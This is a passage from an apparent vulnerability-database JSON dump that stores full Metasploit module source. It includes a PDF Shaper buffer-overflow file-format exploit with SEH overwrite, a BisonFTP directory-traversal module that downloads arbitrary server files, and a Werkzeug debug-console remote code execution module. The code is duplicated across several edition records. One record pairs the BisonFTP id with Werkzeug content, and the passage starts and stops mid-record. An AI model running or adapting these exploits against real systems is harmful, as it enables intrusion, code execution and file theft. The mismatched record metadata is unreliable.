["DEBIAN:DLA-1873-1:7E39D"]}], "modified": "2019-08-11T01:38:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/shaper_pdf_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PDF Shaper Buffer Overflow',\n 'Description' => %q{\n PDF Shaper is prone to a security vulnerability when 
processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC\n 'metacom' # MSF Module\n ],\n 'References' =>\n [\n ['EDB', '37760']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process', # none/process/thread/seh\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n ['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',\n {\n 'Ret' => 0x00402AC1, # PDFTools.exe\n 'Offset' => 433\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 03 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])\n ], self.class\n )\n end\n\n def exploit\n file_create(make_pdf)\n end\n\n def jpeg\n buffer = \"\\xFF\\xD8\\xFF\\xEE\\x00\\x0E\\x41\\x64\\x6F\\x62\\x65\\x00\\x64\\x80\\x00\\x00\"\n buffer << \"\\x00\\x02\\xFF\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\"\n buffer << \"\\x02\\x03\\x02\\x02\\x02\\x03\\x04\\x03\\x03\\x03\\x03\\x04\\x05\\x04\\x04\\x04\"\n buffer << \"\\x04\\x04\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x07\\x08\\x08\\x08\"\n buffer << \"\\x07\\x05\\x09\\x0A\\x0A\\x0A\\x0A\\x09\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x01\\x03\\x02\\x02\\x03\\x03\\x03\\x07\\x05\"\n buffer << \"\\x05\\x07\\x0D\\x0A\\x09\\x0A\\x0D\\x0F\\x0D\\x0D\\x0D\\x0D\\x0F\\x0F\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0F\\x0F\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0F\\x0C\\x0E\\x0E\\x0E\"\n buffer << \"\\x0E\\x0E\\x0C\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n buffer << \"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\xFF\\xC0\\x00\\x14\\x08\\x00\\x32\\x00\"\n buffer << 
\"\\xE6\\x04\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\x04\\x11\\x00\\xFF\\xC4\"\n buffer << \"\\x01\\xA2\\x00\\x00\\x00\\x07\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x00\\x00\\x00\\x04\\x05\\x03\\x02\\x06\\x01\\x00\\x07\\x08\\x09\\x0A\\x0B\\x01\"\n buffer << \"\\x54\\x02\\x02\\x03\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x01\\x00\\x02\\x03\\x04\\x05\\x06\\x07\"\n buffer << rand_text(target['Offset']) # junk\n buffer << generate_seh_record(target.ret)\n buffer << payload.encoded\n buffer << rand_text(2388 - payload.encoded.length)\n buffer\n end\n\n def make_pdf\n @pdf << header\n add_object(1, \"<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>\")\n add_object(2, \"<</Type/Outlines>>\")\n add_object(3, \"<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>\")\n add_object(4, \"[/PDF/Text/ImageC]\")\n add_object(5, \"<</Type/Page/Parent 3 0 R/Contents 6 0 R>>\")\n stream_1 = \"stream\" << eol\n stream_1 << \"0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q\" << eol\n stream_1 << \"endstream\" << eol\n add_object(6, \"<</Length 91>>#{stream_1}\")\n stream = \"<<\" << eol\n stream << \"/Width 230\" << eol\n stream << \"/BitsPerComponent 8\" << eol\n stream << \"/Name /X\" << eol\n stream << \"/Height 50\" << eol\n stream << \"/Intent /RelativeColorimetric\" << eol\n stream << \"/Subtype /Image\" << eol\n stream << \"/Filter /DCTDecode\" << eol\n stream << \"/Length #{jpeg.length}\" << eol\n stream << \"/ColorSpace /DeviceCMYK\" << eol\n stream << \"/Type /XObject\" << eol\n stream << \">>\"\n stream << \"stream\" << eol\n stream << jpeg << eol\n stream << \"endstream\" << eol\n add_object(7, stream)\n finish_pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-11T01:38:46", "differentElements": ["cvelist", "cvss", "description", "modified", "published", 
"references", "sourceData", "sourceHref", "title"], "edition": 76}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-11T03:39:44", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-11T03:39:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-11T03:39:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n 
version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-11T03:39:44", "differentElements": ["sourceData"], "edition": 77}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-14T11:48:11", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-08-14T11:48:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-14T11:48:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-14T11:48:11", "differentElements": ["sourceData"], "edition": 78}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-14T13:47:39", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-14T13:47:39"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-14T13:47:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-14T13:47:39", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 79}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "07ca257e2a6bec53a5eb3383fd1e2a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "Werkzeug Debug Shell Command Execution", "description": "This module will exploit the Werkzeug debug console to put down a Python shell. This debugger \"must never be used on production machines\" but sometimes slips passed testing. 
Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian\n", "published": "2015-06-28T01:38:25", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger"], "cvelist": [], "lastseen": "2019-08-22T20:28:52", "history": [], "viewCount": 5, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-08-22T20:28:52"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:7046413755550762908"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112634", "OPENVAS:1361412562310112633", "OPENVAS:1361412562310876699", "OPENVAS:1361412562310876695", "OPENVAS:1361412562310844144", "OPENVAS:1361412562310876700", "OPENVAS:1361412562310844142", "OPENVAS:1361412562310815547", "OPENVAS:1361412562310844141", "OPENVAS:1361412562310815549"]}], "modified": "2019-08-22T20:28:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/werkzeug_debug_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Werkzeug Debug Shell Command Execution',\n 'Description' => %q{\n This module will exploit the Werkzeug debug console to put down a\n Python shell. 
This debugger \"must never be used on production\n machines\" but sometimes slips passed testing.\n\n Tested against:\n 0.9.6 on Debian\n 0.9.6 on Centos\n 0.10 on Debian\n },\n 'Author' => 'h00die <mike[at]shorebreaksecurity.com>',\n 'References' =>\n [\n ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['python'],\n 'Targets' => [[ 'werkzeug 0.10 and older', {}]],\n 'Arch' => ARCH_PYTHON,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 28 2015'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'URI to the console', '/console'])\n ], self.class\n )\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67\n if res && res.body =~ /Werkzeug powered traceback interpreter/\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n # first we need to get the SECRET code\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n if res && res.body =~ /SECRET = \"([a-zA-Z0-9]{20})\";/\n secret = $1\n vprint_status(\"Secret Code: #{secret}\")\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'vars_get' => {\n '__debugger__' => 'yes',\n 'cmd' => payload.encoded,\n 'frm' => '0',\n 's' => secret\n }\n )\n else\n print_error('Secret code not detected.')\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-22T20:28:52", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 80}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare 
BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-22T22:24:04", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-22T22:24:04"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-22T22:24:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-22T22:24:04", "differentElements": ["sourceData"], "edition": 81}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-24T16:25:18", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-08-24T16:25:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-24T16:25:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-24T16:25:18", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-24T18:30:59", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-24T18:30:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-24T18:30:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response 